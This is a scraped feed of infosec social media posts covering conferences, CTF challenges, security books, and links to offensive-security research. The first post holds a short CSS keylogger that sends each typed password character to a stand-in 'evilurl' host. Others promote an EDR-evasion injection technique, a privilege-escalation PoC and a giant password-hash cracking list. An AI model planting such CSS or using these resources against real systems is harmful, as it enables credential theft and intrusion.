؜

magic: CSS keylogger   <style> input[type="password"][value$="a"] {  background-image: url("http[:]//evilurl[:]/a"); }   input[type="password"][value$="b"] {   background-image: url("http[:]//evilurl[:]/b"); } </style>

Can a small, self-hosted LLM outperform state-of-the-art models at evasive malware development? outflank.nl/blog/2025/08/0… credits: @kyleavery, @OutflankNL, @BlackHatEvents #ai #exploits #offsec

@ITSecurityguard Peter hurt; send bitcoin. lol

We all know who the real #1 US Hacker on HackerOne is 👇

@BlackHills this link for @DarknetDiaries / @JackRhysider listeners is dead (404)

How are you interviewing your security tech candidates? #infosec

@WesSec_ @w34kp455 great tip! If you cannot install it use `grep --mmap mypass file_name.txt`

@w34kp455 LPT: using ripgrep instead of regular grep will save you a lot of time going through this list github.com/BurntSushi/rip…

Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on weakpass.com, you can find precomputed datasets for various wordlists and different hashes - all free! FYI: all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!🔥

@w34kp455 Sad. i was hoping @defusesec's crackstation is using this list but apparently not:

New Blog Alert! 🚨 Introducing Early Cascade Injection, a stealthy process injection technique that targets Windows process creation, avoids cross-process APCs, and evades top-tier EDRs. Learn how it combines Early Bird APC Injection & EDR-Preloading: outflank.nl/blog/2024/10/1…

@Bsideslisbon @Arr0way any updates? :D

@Arr0way hi, we are now making sure sponsors and supporting organizations are covered. As soon as we are able we will inform everyone. Keep following us here and on Linkedin (linkedin.com/company/bsides…) for updates.

It was incredible! The record was broken. Less than 24h and the tickets are sold out! See you all in November! (Yes, there will be a much smaller number of tickets available at a later time).

Uh-oh just heard about @BSidesLisbon and I really want to go! Anyone not going to make it? I would love to take your ticket. #BSidesLisbon #Lisbon #infosecurity

@bitvavocom someone is trying to (sms) phish your users in the #Netherlands; you should probably do something about that.

@JBl4nks @0xTib3rius facebook is built on php, go hack it if you can :-p

@0xTib3rius 10000% Yes. It's PHP which is garbage.

Is there anything insecure about this code?

@Hakeedo @HaboobSa we need a writeup for the red challenge!

@xxByte @HaboobSa hahaha, ok try this one its supposed to be soooo easy 😉. And the prize is Macbook Pro too.

MacBook Pro from @HaboobSa if you solve the challenge. Just scan the QR code. #CTF #BHMEA23

@cyberomin highest number in the column. pretty straightforward 😊 good luck

Brethren, I need your help; how do you solve this? What's the solution to this? Is there a pattern to the solution? The example is highlighted in pink. Help!! 😫😫😫

@0xMaz anyone solved the red??

Haboob Blue CTF challenge Writeup. Hardest Blue challenge i faced ever 🤡 0xmaz.me/posts/Haboob-B…

@Hakeedo @HaboobSa i am way too invested in red now. I really could use a hint!

@a_greenberg @DarknetDiaries take notes

I spent this year talking to the 3 young hackers behind Mirai, the malware that once broke the internet. This is WIRED's resulting cover story—an epic, untold, 22,000-word tale of cybercrime, friendship, chaos, betrayal, paranoia, and redemption. Read: wired.com/story/mirai-un…

@PhillipWylie @Blackhatmea @AliasInfosec @DCG940 is it going to be streamed? or recoreded somewhere we can access later :)

Ready for day two of @Blackhatmea. My talk is at 6:50 PM in the Executive track today. My talk is titled Offense Security Awareness for CISOs. #bhmea23

#Ubuntu Privilege Escalation bash one-liner using CVE-2023-32629 & CVE-2023-2640 github.com/ThrynSec/CVE-2… Nifty #PoC! @raptor/111407835699201753" target="_blank" rel="nofollow noopener">infosec.exchange/@raptor/111407…

@snyff nothing beats the shellcoder handbook

If you could only have one security book, which one would pick?